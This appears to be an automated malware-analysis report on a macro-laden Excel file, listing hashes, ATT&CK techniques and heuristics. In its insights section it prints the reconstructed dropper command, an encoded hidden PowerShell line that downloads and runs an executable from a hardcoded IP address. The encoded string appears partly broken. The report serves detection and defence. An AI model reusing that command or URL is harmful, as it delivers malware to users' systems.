Office (OOXML) / .XLSM malware analysis — malicious · b098af90111bbf85

MALICIOUS

Office (OOXML) / .XLSM

389.9 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 15.0300

MD5: 01177a296864371c4d21f4552a209513 SHA-1: 5fcf68528a41687c3dc3a814ee1bfa3deb924e35 SHA-256: b098af90111bbf857fe2e5f615e0abfccc2409c74db981096a5a5020778d691e

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

This XLSM document contains VBA macros that employ a lure to enable content, a common technique for malware droppers. Upon activation, the macro constructs and executes a PowerShell command. This command is designed to download a second-stage payload from a hardcoded URL and then execute it. The reconstructed PowerShell command is: start /MIN C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBDAG4A bQBnAGYAcgBuAHAAcQB1AHkAIAAuAGUAZwBkAHAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiACAAaQBsAGUAaQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAWkAbABlACgAIgBhAHQAdABwADoALwAvADEAOAAuADEAOQA1AC4AMQA0AC4AMQA4ADMALwA2AC8ANwAvAEIAUwBGAF8AMA A xADEAMwAwADcAOAA1ADUAMAAwADAAМАAwADgALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFQARABQAEUAXwBVAHAAYwBOAGEA bQBlACIAKQ A7AFMAdABhAHIAdAAtAFMAIAAoACIAJABlAG4AdgA6AEUAUABUADQAUABQAFQAYQBQACIAKQ. The embedded URL is http://18.195.14.183/6/7/BSF_0130078500008.exe.

Heuristics 5

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA project inside OOXML medium OOXML_VBA

Document contains vbaProject.bin — VBA macros present
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
External hyperlinks (6) low OOXML_EXTERNAL_HYPERLINKS

Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844736
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://go.microsoft.com/fwlink/?linkid=844736
- http://go.microsoft.com/fwlink/?LinkId=844969
- https://go.microsoft.com/fwlink/?linkid=844749
- https://go.microsoft.com/fwlink/?linkid=844741
- https://go.microsoft.com/fwlink/?linkid=844732
- https://go.microsoft.com/fwlink/?linkid=844725
- https://go.microsoft.com/fwlink/?linkid=844742
- https://go.microsoft.com/fwlink/?linkid=844734
- https://go.microsoft.com/fwlink/?linkid=844751
- https://go.microsoft.com/fwlink/?linkid=844745
- https://go.microsoft.com/fwlink/?linkid=844743
- https://go.microsoft.com/fwlink/?linkid=844728
- https://go.microsoft.com/fwlink/?linkid=844746
- https://go.microsoft.com/fwlink/?linkid=844747
- https://go.microsoft.com/fwlink/?linkid=844726
- https://go.microsoft.com/fwlink/?linkid=844738
- https://go.microsoft.com/fwlink/?linkid=844735
- https://go.microsoft.com/fwlink/?linkid=844750
- http://go.microsoft.com/fwlink/?LinkId=846285

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `7d79e0bedb7629dd8adf206c6f52f6a4373289a1ccf8699773b94b39d2d15275`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6140 bytes
`vbaProject_00.bin` `2182384cceeca55d8191b06f5b32b8d78d04167f0afe172bdbce6bcffc75dcf5`	vba-project	OOXML VBA project: xl/vbaProject.bin	10752 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.